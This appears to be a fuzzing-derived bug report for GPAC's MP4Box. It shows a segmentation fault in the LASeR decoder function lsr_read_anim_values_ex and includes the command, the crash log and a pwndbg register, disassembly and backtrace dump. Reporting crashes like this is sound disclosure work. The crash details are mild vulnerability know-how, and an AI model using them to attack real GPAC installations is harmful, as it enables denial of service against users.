    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**command:**

lsr\_read\_anim\_values\_ex.part-lsr\_read\_animateTransform.zip

**Result**

lsr\_read\_anim\_values\_ex.part-lsr\_read\_animateTransform/id:000439,si  
g:11,src:004575+004803,op:splice,rep:2

     ../../test/lib/MP4Box -bt lsr_read_anim_values_ex.part-lsr_read_animateTransform/id:000439,si
    g:11,src:004575+004803,op:splice,rep:2
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 853091
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Incomplete box mdat - start 11495 size 853091
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 LASeR Scene Parsing
    [LASeR] memory overread - corrupted decoding
    [1]    1634950 segmentation fault  ../../test/lib/MP4Box -bt
    

**gdb**

lsr\_read\_anim\_values\_ex.part-lsr\_read\_animateTransform/id:000439,si  
g:11,src:004575+004803,op:splice,rep:2

    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7b551a6 in lsr_read_anim_values_ex.part () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x0
     RBX  0x5
     RCX  0x5555555c6010 ◂— 0x70006
     RDX  0x6
     RDI  0x5555556e4020 ◂— 0x0
     RSI  0x1
     R8   0x5555556e4000 ◂— 0x0
     R9   0x0
     R10  0x7ffff7759e4a ◂— 'gf_list_insert'
     R11  0x206
     R12  0x5555555e1020 ◂— 0x54 /* 'T' */
     R13  0x5555556e4000 ◂— 0x0
     R14  0x5555555e35c0 —▸ 0x5555555e3630 ◂— 0x0
     R15  0x5555556e4020 ◂— 0x0
     RBP  0x3
     RSP  0x7fffffff6c90 ◂— 0xf00000003
     RIP  0x7ffff7b551a6 (lsr_read_anim_values_ex.part+1078) ◂— movss  xmm0, dword ptr [rax]
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
     ► 0x7ffff7b551a6 <lsr_read_anim_values_ex.part+1078>    movss  xmm0, dword ptr [rax]
       0x7ffff7b551aa <lsr_read_anim_values_ex.part+1082>    movss  dword ptr [r13 + 8], xmm0
       0x7ffff7b551b0 <lsr_read_anim_values_ex.part+1088>    call   gf_list_get@plt                <gf_list_get@plt>
    
       0x7ffff7b551b5 <lsr_read_anim_values_ex.part+1093>    test   rax, rax
       0x7ffff7b551b8 <lsr_read_anim_values_ex.part+1096>    je     lsr_read_anim_values_ex.part+1108                <lsr_read_anim_values_ex.part+1108>
    
       0x7ffff7b551ba <lsr_read_anim_values_ex.part+1098>    movss  xmm0, dword ptr [rax]
       0x7ffff7b551be <lsr_read_anim_values_ex.part+1102>    movss  dword ptr [r13], xmm0
       0x7ffff7b551c4 <lsr_read_anim_values_ex.part+1108>    mov    esi, 2
       0x7ffff7b551c9 <lsr_read_anim_values_ex.part+1113>    mov    rdi, r15
       0x7ffff7b551cc <lsr_read_anim_values_ex.part+1116>    call   gf_list_get@plt                <gf_list_get@plt>
    
       0x7ffff7b551d1 <lsr_read_anim_values_ex.part+1121>    test   rax, rax
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7fffffff6c90 ◂— 0xf00000003
    01:0008│     0x7fffffff6c98 ◂— 0x7fff00000008
    02:0010│     0x7fffffff6ca0 ◂— 0x350000006e /* 'n' */
    03:0018│     0x7fffffff6ca8 —▸ 0x5555555e1020 ◂— 0x54 /* 'T' */
    04:0020│     0x7fffffff6cb0 ◂— 0x0
    05:0028│     0x7fffffff6cb8 —▸ 0x5555555e0f00 —▸ 0x5555555e0f20 —▸ 0x5555555e0f60 —▸ 0x5555555e0f40 ◂— ...
    06:0030│     0x7fffffff6cc0 ◂— 0x0
    07:0038│     0x7fffffff6cc8 ◂— 0x2748627e3b91600
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff7b551a6 lsr_read_anim_values_ex.part+1078
       f 1   0x7ffff7b5d9e8 lsr_read_animateTransform+424
       f 2   0x7ffff7b5beeb lsr_read_scene_content_model+1547
       f 3   0x7ffff7b5c89c lsr_read_group_content.part+316
       f 4   0x7ffff7b60a76 lsr_read_svg+838
       f 5   0x7ffff7b58817 lsr_read_command_list+759
       f 6   0x7ffff7b5ab74 lsr_decode_laser_unit+708
       f 7   0x7ffff7b6239d gf_laser_decode_command_list+333
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  0x00007ffff7b551a6 in lsr_read_anim_values_ex.part () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #1  0x00007ffff7b5d9e8 in lsr_read_animateTransform () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #2  0x00007ffff7b5beeb in lsr_read_scene_content_model () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #3  0x00007ffff7b5c89c in lsr_read_group_content.part () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #4  0x00007ffff7b60a76 in lsr_read_svg () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #5  0x00007ffff7b58817 in lsr_read_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #6  0x00007ffff7b5ab74 in lsr_decode_laser_unit () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #7  0x00007ffff7b6239d in gf_laser_decode_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #8  0x00007ffff7aa3061 in gf_sm_load_run_isom () from /root/fuck_bin/gpac/test/lib/libgpac.so.10
    #9  0x00005555555844a8 in dump_isom_scene ()
    #10 0x000055555557b42c in mp4boxMain ()
    #11 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1b8) at ../csu/libc-start.c:308
    #12 0x000055555556c45e in _start ()

Tag

#ubuntu